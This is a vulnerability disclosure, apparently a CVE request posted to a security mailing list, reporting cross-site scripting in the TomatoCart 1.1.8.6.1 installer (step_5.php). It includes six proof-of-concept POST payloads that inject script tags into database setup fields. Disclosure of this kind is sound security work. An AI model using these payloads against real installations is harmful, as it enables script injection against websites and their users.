CVE request - TomatoCart 1.1.8.6.1 Multiple Cross-Site Scripting (XSS)

[haojun hou <haojunhou () gmail com>]

Hi:
TomatoCart 1.1.8.6.1 - Multiple Cross-Site Scripting (XSS) 

Procuct: TomatoCart

Vendor: TomatoCart http://www.tomatocart.com

Vunlerable Version: 1.1.8.6.1 and probably prior

Tested Version: 1.1.8.6.1

Author: Haojun Hou in ADLab of Venustech

 

Advisory Details:

Haojun Hou in ADLab of Venustech discovered Multiple Cross-Site Scripting (XSS) in TomatoCart 1.1.8.6.1, which can be 
exploited to add,modify or delete information in application`s database and gain complete control over the application.

 

The vulnerability exists due to insufficientfiltration of user-supplied data in multiple HTTP POST parameters passed to 
“TomatoCart-v1-released-v1.1.8.6.1/install/templates/pages/step_5.php” url. An attacker could execute arbitrary HTML 
and script code in browser in context of the vulnerable website.

The exploitation examples below uses the "alert()" JavaScript function to see a  pop-up messagebox:

(1)POST

DB_DATABASE=  <>"?>";</script><script>alert(1);</script><script>"<?php"

(2)POST

DB_SERVER_PASSWORD= "?>";</script><script>alert(1);</script><script>"<?php"

(3)POST

DB_TABLE_PREFIX= "?>";</script><script>alert(1);</script><script>"<?php"

(4)POST

DB_DATABASE_CLASS= "?>";</script><script>alert(1);</script><script>"<?php"

(5)POST

DB_SERVER_USERNAME= "?>";</script><script>alert(1);</script><script>"<?php"

(6)POST

DB_SERVER= "?>";</script><script>alert(1);</script><script>"<?php"

 

Could you please help me assign a CVE for this issue?